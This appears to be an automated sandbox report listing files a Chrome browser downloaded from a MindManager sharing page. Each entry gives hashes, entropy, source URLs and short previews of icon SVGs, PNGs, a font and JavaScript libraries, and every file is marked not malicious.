                                                                Preview:{"region":"us","status":"published","upload_status":"published","options":"{\"topicClickOpensLink\":null,\"mapFitContent\":null,\"mode\":\"published\",\"brandingHyperlink\":null,\"downloadable\":null}","name":"Whiteboard 2.mmap","createdAt":"2024-07-03T11:55:58.000Z","updatedAt":"2024-07-03T11:55:58.000Z","viewsCount":678,"publishType":"private","userType":"Trial","url":"https://us.sharing.mindmanager.com/cbiQb7SDgu5zNdFUqzqQ","logo":null}
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2212
                                                                Entropy (8bit):4.909512408741757
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D00BB651CC8ECACA01E7D342DE795163
                                                                SHA1:E0400795C924B3CB598350EF57B75293C9C9E2D8
                                                                SHA-256:7EB00F938D4C55FEDC51F79CE579E1C3E036FFD4ACD870400FA19CE776EB1043
                                                                SHA-512:7BA286D56CE84CFCF8D000516E9E0198FF0ADEE0D119E913487F9A39F7F0561D44CA09EB6E1FB5E3540F9E18E52FB417AFDA279DFE659FC474F0567BDE6DDE57
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/crossfunctionalflowchartv.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="22" y="2" width="40.1225" height="85.6798" rx="2" fill="#F1F1F4"/>.<rect opacity="0.2" x="33.0322" y="9.48828" width="19.0582" height="1.66369" fill="#53535B"/>.<rect x="64.9766" y="2" width="40.1225" height="85.6798" rx="2" fill="#F1F1F4"/>.<rect opacity="0.2" x="76.0088" y="9.48828" width="19.0582" height="1.66369" fill="#53535B"/>.<rect x="107.877" y="2" width="40.1225" height="85.6798" rx="2" fill="#F1F1F4"/>.<rect opacity="0.2" x="118.909" y="9.48828" width="19.0582" height="1.66369" fill="#53535B"/>.<rect x="115.497" y="29.5234" width="24.9109" height="7.73044" rx="3.86522" fill="#ACEA87"/>.<rect x="30.8496" y="29.498" width="21.5894" height="7.73044" rx="3.86522" fill="#5791C0"/>.<rect x="94.9834" y="62.0645" width="19.0229" height="7.58989" transform="rotate(-180 94.9834 62.0645)" fill="#66B7F8"/>.<ellipse cx="94.5313" cy="58.2695" rx="2.26463" ry="3.79495" transform="rota
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1638
                                                                Entropy (8bit):4.567163047468655
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:583373999B6B676C2F1C10D927F017B9
                                                                SHA1:11ABF7EE679277AF2684B38EE84E80405B9873FC
                                                                SHA-256:94163A41E910C669168F37FC85FBD18D066D1C11CCE26C86E54547D40814A893
                                                                SHA-512:02CFB814779BD90C371CF48E5091597B5444D383527FD4D9B2C13A0692B55A037C2579ADE5363BEDD96E9F5F92AD38D3413783FCADE9475C14AA3F63E598500A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/roPriority02.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#00a6ff;}.cls-2{fill:#0f77b2;}.cls-3{fill:#fff;}.cls-4{fill:gray;}</style></defs><title>roPriority02</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M5.4,13a6.14,6.14,0,0,1-.11-1,3.87,3.87,0,0,1,.31-1.53,3.65,3.65,0,0,1,.76-1.16,10.61,10.61,0,0,1,1-.87c.36-.27.69-.51,1-.7a4,4,0,0,0,.76-.61,1,1,0,0,0,.3-.65.84.84,0,0,0-.3-.7,1.16,1.16,0,0,0-.72-.24,1.27,1.27,0,0,0-.82.29,2.31,2.31,0,0,0-.6.72L5.24,5.36A4,4,0,0,1,6.55,3.88,3.6,3.6,0,0,1,8.6,3.31a3.63,3.63,0,0,1,2.28.75,2.58,2.58,0,0,1,1,2.17,2.86,2.86,0,0,1-.4,1.5,3.66,3.66,0,0,1-1,1.12,11.65,11.65,0,0,1-1.15.78,11.42,11.42,0,0,0-1,.7,1,1,0,0,0-.45.67H12v2Z"/><path class="cls-3" d="M4.4,12a6.14,6.14,0,0,1-.11-1A3.87,3.87,0,0,1,4.6,9.44a3.65,3.65,0,0,1,.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (5945)
                                                                Category:downloaded
                                                                Size (bytes):309775
                                                                Entropy (8bit):5.604585757515243
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B7B027F4BB96D826250A4A76EAB7B240
                                                                SHA1:C7AB452F31D145E12B6C10B049BF10D05AAF5BE0
                                                                SHA-256:4C01CDD8007D0D6228575FF993FEB3133B612D20DDB543387987F491022143C3
                                                                SHA-512:71D91FFD6A39E4348D4025343C5F7069A83E55EACF78E02714BB276514B85530276E72F58D85576C2E22EE217F7CAC354ADBDE52B9FD17F894AAEC87B5A6E536
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.googletagmanager.com/gtag/js?id=G-4JRX37E4V2&l=dataLayer&cx=c
                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"7",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_cross_domain","priority":24,"vtp_rules":["list","mindmanager\\.cn|mindjet\\.com|alludo\\.com|aftershotpro\\.com|corel\\.com|coreldraw\\.com|corelvector\\.com|painterartist\\.com|paintshoppro\\.com|photomirage\\.io|pinnaclesys\\.com|roxio\\.com|videostudiopro\\.com|windvdpro\\.com|wordperfect\\.com|awingu\\.com|parallels\\.cn|parallels\\.com|adremover\\.org|openthefile\\.net|reviversoft\\.com|simplestar\\.com|winzip\\.com|winzipdisktools\\.com|winzipdriverupdater\\.com|winzipinstallprotector\\.com|winzipmacoptimizer\\.com|winzipmalwareprotector\\.com|winzipprivacyprotector\\.com|winzipregistryoptimizer\\.com|winzipsystemtools\\.com|winzipultimatepccare\\.com|zipshare\\.com"],"tag_id":10},{"function":
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):832
                                                                Entropy (8bit):5.224436748999546
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:577F59C5823ECFD77DF204733B4CFA0D
                                                                SHA1:1321AE7DECD58F8F96CEBFE7FA0A0AB9E2397A0E
                                                                SHA-256:751546BB5C57D7E3C5F0F748F7197DD0E0FEE1695CA275A9DEB0BB957AD8B4B7
                                                                SHA-512:96BFD11C96B576A766CD5F3345035858C97D3DF208B92864EB19928D6F18575E5AB0451DCA432727C383C0621E2BE2F9C798C6857355474B3E58B73E5E287582
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_add_boundary.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 25.52 24"><defs><style>.cls-1{fill:#96be7d;stroke:#63a558;stroke-miterlimit:10;}.cls-2{fill:#fff;}.cls-3{fill:#63a558;}</style></defs><title>web app toolbar assets add boundary</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_2-2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M23,.5H9.58c-.3,0-6.56,8-8.74,11a1.43,1.43,0,0,0,0,1.87S9.28,23.5,9.58,23.5H23a2,2,0,0,0,2-2V2.5A2,2,0,0,0,23,.5Zm0,21H10L3.26,13.63a1.45,1.45,0,0,1,.06-2.19L10,2.5H23Z"/><polygon class="cls-2" points="13.02 15.5 13.02 13.5 11.02 13.5 11.02 10.5 13.02 10.5 13.02 8.5 16.02 8.5 16.02 10.5 18.02 10.5 18.02 13.5 16.02 13.5 16.02 15.5 13.02 15.5"/><path class="cls-3" d="M15.52,9v2h2v2h-2v2h-2V13h-2V11h2V9h2m1-1h-4v2h-2v4h2v2h4V14h2V10h-2V8Z"/></g></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):1730
                                                                Entropy (8bit):4.369920946283865
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:157C26A9B1ADF09B446B23985D512602
                                                                SHA1:5A8BED821451EB33BB83BED034F679E2EF9F9AD4
                                                                SHA-256:97CF7B917666225C68E2A2F112EB1C0B5C18C0A98CCCC8E73FA1B8B48CD3B7CF
                                                                SHA-512:A3DAF282C5E14F5C64F03A9C2B305CFAF47FB9AA1450F71E38A586724AEC7EB6ECF3B4C2B70BE645F1AA8C64C3CAD89D8C5219A455F341F0A661AC60DC4D2E80
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 15.92 16"><defs><style>.cls-1{fill:#ea969d;}.cls-2{fill:#c1272d;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M1.18,6.7a10.53,10.53,0,0,1,3.48-3,10,10,0,0,1,3.05-1A11.42,11.42,0,0,1,10,2.4h.44L11,.82l4,4.53L9.08,6.53l.58-1.72L9.22,4.7a5.77,5.77,0,0,0-1.33-.19H7.51a9.84,9.84,0,0,0-2.38.34,10.86,10.86,0,0,0-2.7,1.07A14,14,0,0,0,1.18,6.7Z"/><path class="cls-2" d="M11.18,1.63l3,3.45L9.71,6l.2-.61.3-.87-.9-.2A6.15,6.15,0,0,0,7.9,4.1H7.51A10.6,10.6,0,0,0,5,4.43a13.42,13.42,0,0,0-1.48.48,11.63,11.63,0,0,1,1.31-.83,10,10,0,0,1,2.94-1A11.08,11.08,0,0,1,10,2.82h.73l.2-.58.21-.62M10.85,0l-.67,2H10a11.51,11.51,0,0,0-2.41.29A10.46,10.46,0,0,0,4.47,3.35,10.71,10.71,0,0,0,1.86,5.28,10,10,0,0,0,0,7.81L.27,8A11.44,11.44,0,0,1,2.63,6.28a10.32,10.32,0,0,1,2.6-1,10,10,0,0,1,2.28-.32h.38a5.08,5.08,0,0,1,1.23.18l-.67,2,7.33-1.47L10.85,0Z"/><path class="cls-1" d="M.92,10.65,6.84,9.47l-.59,1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1969
                                                                Entropy (8bit):3.9072485091270925
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F9735EF49648449EFB4557832C0E2CF4
                                                                SHA1:E5BBCD9BFA3028AA599E1BEF0BFA53A7937E0EB3
                                                                SHA-256:B9598CAA3C937C48B8681E2B9C90C10C41D17CE4BC111D5C1F91ED794B0A2A27
                                                                SHA-512:1DA793F6088BFD263991CD295F13158343CD5255C2D993A5F8BDB89B3D25E9906EBD05120205EB8CAA769F690CEE34BC9B659A22771ADA3432A4EA7D4E10B188
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/design/text-format-strikethrough-new.svg
                                                                Preview:<svg viewBox="0 0 40 50" xmlns="http://www.w3.org/2000/svg">.<path d="M20.5431 35.3361C19.3111 35.3361 18.1164 35.1027 16.9591 34.6361C15.8204 34.1694 14.8124 33.5067 13.9351 32.6481L15.8391 30.4361C16.4924 31.0521 17.2391 31.5561 18.0791 31.9481C18.9191 32.3214 19.7591 32.5081 20.5991 32.5081C21.6444 32.5081 22.4378 32.2934 22.9791 31.8641C23.5204 31.4347 23.7911 30.8654 23.7911 30.1561C23.7911 29.7827 23.7164 29.4654 23.5671 29.2041C23.4364 28.9427 23.2404 28.7187 22.9791 28.5321C22.7364 28.3267 22.4378 28.14 22.0831 27.972C21.7471 27.804 21.3738 27.6361 20.9631 27.4681L18.4431 26.3761C17.9951 26.1894 17.5471 25.956 17.0991 25.6761C16.6698 25.396 16.2778 25.0601 15.9231 24.6681C15.5684 24.2761 15.2791 23.8187 15.0551 23.2961C14.8498 22.7734 14.7471 22.1761 14.7471 21.5041C14.7471 20.7761 14.8964 20.1041 15.1951 19.4881C15.5124 18.8534 15.9418 18.3027 16.4831 17.8361C17.0244 17.3694 17.6684 17.0054 18.4151 16.7441C19.1804 16.4827 20.0111 16.3521 20.9071 16.3521C21.9711 16.3521 22.9978
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1363
                                                                Entropy (8bit):4.608499514026686
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7C85D508F7620CA14AD5BEF8A6518B3D
                                                                SHA1:CFD4FC29431BCC52332536895355EA9059560FF1
                                                                SHA-256:60CAF46549ED3A6E10027F464B01E74AB92B54408CFACD550DB7EC53A8305AF5
                                                                SHA-512:E95F1EFF4591A995F779BC2AF83C737F807AA6474D18B61BE388D5B5EC56DBF508F466B30ECFCFB2CD2F27F01FEA1665D0717821F6451BC4798908C3BFCBDDCC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/search-button.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 41 41"><defs><style>.cls-1{fill:#fff;stroke:#3a52a4;stroke-miterlimit:10;}.cls-2{fill:#3a52a4;}</style></defs><title>search button</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.5" y="0.5" width="40" height="40" transform="translate(0 41) rotate(-90)"/><path class="cls-2" d="M29.57,30a.49.49,0,0,1,.13.36.45.45,0,0,1-.16.35.39.39,0,0,1-.16.1.58.58,0,0,1-.19,0,.52.52,0,0,1-.2,0,.44.44,0,0,1-.17-.12l-5.95-6.48a7.52,7.52,0,0,1-1,.71,7.2,7.2,0,0,1-1.14.51,7.67,7.67,0,0,1-4,.28A7.37,7.37,0,0,1,14,24.57a7.16,7.16,0,0,1-1.14-.95A7.48,7.48,0,0,1,12,22.48a7.67,7.67,0,0,1-.69-1.29,7.19,7.19,0,0,1-.42-1.4,7.75,7.75,0,0,1,0-2.95,7.19,7.19,0,0,1,.42-1.4A7.51,7.51,0,0,1,12,14.16,8,8,0,0,1,12.9,13a7.49,7.49,0,0,1,2.43-1.63,7.62,7.62,0,0,1,1.4-.42,7.5,7.5,0,0,1,2.95,0,7.62,7.62,0,0,1,1.4.42A7.49,7.49,0,0,1,23.5,13a8,8,0,0,1,.94,1.15,7.51,7.51,0,0,1,.69,1.28,7.19,7.19,0,0,1,.42,1.4,7.63,7.63,0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2322
                                                                Entropy (8bit):4.811637296843298
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6E7EADAC21FEEC836CDAE372936A6C5D
                                                                SHA1:D7AC1DE30B8577BE206C0D7209C2FCB4D8722ABC
                                                                SHA-256:6C7D3E1BB8B8F6A2467579402D5FEE2FC1CBCEFFE37C172C866604514FA89505
                                                                SHA-512:91A185FD91D191244BB3F237C93CF09ED3F078CD25B5DE2E4A8DD6090C09D002CA2F15ACF60FAB91122B09F6C5159EC066EAA4E6BC12DA3B4C5C9C07A025D0C5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/rightmap.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M57.21 44.9307C58.7103 45.2909 62.0711 43.6337 63.5114 34.1224C64.9517 24.6112 71.3132 22.2334 74.3138 22.2334H78.8149" stroke="#64B7E1"/>.<path d="M57.21 44.9766C62.3269 44.9766 60.8108 54.5088 65.3118 66.9899C68.9126 73.2305 71.9923 72.8355 78.8149 72.8355" stroke="#64B7E1"/>.<path d="M57.21 44.9766C62.3269 44.9766 62.8955 44.9768 65.1697 46.6822C67.4439 48.3876 71.4237 48.3882 77.1092 48.3882" stroke="#64B7E1"/>.<rect x="14.5" y="36.3809" width="42.2098" height="16.0565" rx="8.02825" fill="white" stroke="#64B7E1"/>.<path d="M109.516 23.3713H117.475M117.475 23.3713C120.318 23.3713 123.161 18.2544 127.709 18.2544C131.348 18.2544 147.419 18.2544 155 18.2544M117.475 23.3713C120.887 23.3713 123.161 28.4883 127.709 28.4883C131.348 28.4883 147.419 28.4883 155 28.4883" stroke="#64B7E1" stroke-width="0.8" stroke-linecap="round"/>.<path d="M109.516 47.8196H117.475M117.475 47.8196C120.318
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):9565
                                                                Entropy (8bit):3.9710250830054705
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:581B806FB641FDBF11934110933A0C6C
                                                                SHA1:503C998849B21B20A05EFA1A99DDE90012D4A184
                                                                SHA-256:783014B17B81167C4B6B25DC2C2E0F1CC6A390728F2A74BA006AEA1DEBA9B216
                                                                SHA-512:8EBC0EC9DDF5F8446DA4C01EFBDDDD8E311828B2463E4FB610B1E1A12CFA4FB617AE063F0C57BA8980C852FBEEEE43EA53B319FAF8DD71738E2AB84E5ABF40E2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/navigation-panel/mouse-move.svg
                                                                Preview:<svg width="186" height="70" viewBox="0 0 186 70" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="25.5" width="79" height="23" rx="4.5" stroke="#3B51A3"/>.<path d="M22.1811 40.12C21.8477 40.12 21.5144 40.0567 21.1811 39.93C20.8477 39.7967 20.5611 39.6333 20.3211 39.44L20.8611 38.7C21.0811 38.8667 21.3011 39 21.5211 39.1C21.7411 39.2 21.9744 39.25 22.2211 39.25C22.4877 39.25 22.6844 39.1933 22.8111 39.08C22.9377 38.9667 23.0011 38.8267 23.0011 38.66C23.0011 38.52 22.9477 38.4067 22.8411 38.32C22.7411 38.2267 22.6111 38.1467 22.4511 38.08C22.2911 38.0067 22.1244 37.9367 21.9511 37.87C21.7377 37.79 21.5244 37.6933 21.3111 37.58C21.1044 37.46 20.9344 37.31 20.8011 37.13C20.6677 36.9433 20.6011 36.7133 20.6011 36.44C20.6011 36.0067 20.7611 35.6533 21.0811 35.38C21.4011 35.1067 21.8344 34.97 22.3811 34.97C22.7277 34.97 23.0377 35.03 23.3111 35.15C23.5844 35.27 23.8211 35.4067 24.0211 35.56L23.4911 36.26C23.3177 36.1333 23.1411 36.0333 22.9611 35.96C22.7877 35.88 22.6044 35.8
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):465
                                                                Entropy (8bit):5.308498673277359
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:724741E938E5F062D4A7784AE115C022
                                                                SHA1:47A25C8E48FA2C4E49E144510E8E0B7792C27516
                                                                SHA-256:7E875CA63E00044CE771044C8C7837A184CCF32AAEC098B71D66C7AB44436983
                                                                SHA-512:DDF37CDC39AA7E3E43D21F4CAAC3A5302F7C26394804D128F39B2622AD349E5550FEB5EBAB22300396F001D4253ADAAE469D0FC3048C54932FA385DF87366252
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/right-arrow.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 11.97"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}</style></defs><title>background_shape_Asset 71</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><polygon class="cls-1" points="6.14 7.48 0.5 7.48 0.5 4.48 6.14 4.48 6.14 0.87 15 5.98 6.14 11.1 6.14 7.48"/><path class="cls-2" d="M6.64,1.73,14,6,6.64,10.23V7H1V5H6.64V1.73M5.64,0V4H0V8H5.64v4L16,6,5.64,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                Category:downloaded
                                                                Size (bytes):28584
                                                                Entropy (8bit):7.992563951996154
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/78rQsV7gAGkgzOBBWe67twBXymXiWuv51
                                                                Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):378
                                                                Entropy (8bit):5.130600669525764
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:79A322C869BC12D19F00E2BFB2082704
                                                                SHA1:271E7D06AB00A77700570219707CD2EBA920DF15
                                                                SHA-256:223E43B1030EB7E89E6879BC44779DF73AF53D442E9089B1D1D489879C0FA433
                                                                SHA-512:7131E82D910AB9AF49F7F72A563927AC099104FBE759AE0107C94B374A11E39E78FC89A85BD5EEED3223B471472A4CF1DA40A99685156437621E9179422A52A0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/priorityNone.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#eaeaea;}.cls-2{fill:#9a9aa3;}</style></defs><title>priorityNone</title><rect class="cls-1" x="1" y="1" width="14" height="14" rx="1" ry="1"/><path class="cls-2" d="M14,2V14H2V2H14m0-2H2A2,2,0,0,0,0,2V14a2,2,0,0,0,2,2H14a2,2,0,0,0,2-2V2a2,2,0,0,0-2-2Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):231
                                                                Entropy (8bit):6.725074433303473
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:547988BAC5584B4608466D761E16F370
                                                                SHA1:C11BB71049702528402A31027F200184910A7E23
                                                                SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                                SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/uv3fdq9ewvK559L3BcA3r2n1PFxqrLSp4LFYWp8NlwK47MW6X34130
                                                                Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):3486
                                                                Entropy (8bit):7.904053303353109
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B90E188A6FB4E4A412BD38471EC1DA9A
                                                                SHA1:102F96C74F64C69E58822BE1A535538B1CB5C4BD
                                                                SHA-256:B768AE9C4878D631486B619A48F805ECA2B66F6E7BAC21554893FE60742B4858
                                                                SHA-512:5A648A6571BCFC4B9C1FAABC0F1E658168B34CC97EC2DDFB234CA562F083BF9E57F0AB8D4D7199A99E5373CCCB83387B8F857B45BCF5F916B524AC336A1B7436
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/RollUp/TaskPastDue.png
                                                                Preview:.PNG........IHDR................a....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):290
                                                                Entropy (8bit):5.066304666497246
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9E333102E9D22247A0737A083EC2985F
                                                                SHA1:E9568CB07B493AE915F5C961019B0C6261B4D6BB
                                                                SHA-256:5C33582C8ADD7AF2E6FC1EF5FAB31763A6D98CA98968BD64D1E607A3165B7D64
                                                                SHA-512:1A1C22DF7A3A2247FDCEA9893415E5F3662CB70C1D8256B1521DC232A2F06FF853D6F801E6A97827801351D590AB09E47C641239993E29309EEA3981B3061612
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/arrow-up.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#32d140;}</style></defs><title>thickarrow_up_green_16</title><rect class="cls-1" x="4" y="5" width="8" height="11"/><polygon class="cls-1" points="8 0 0 8 16 8 8 0"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:downloaded
                                                                Size (bytes):89501
                                                                Entropy (8bit):5.289893677458563
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://code.jquery.com/jquery-3.6.0.min.js
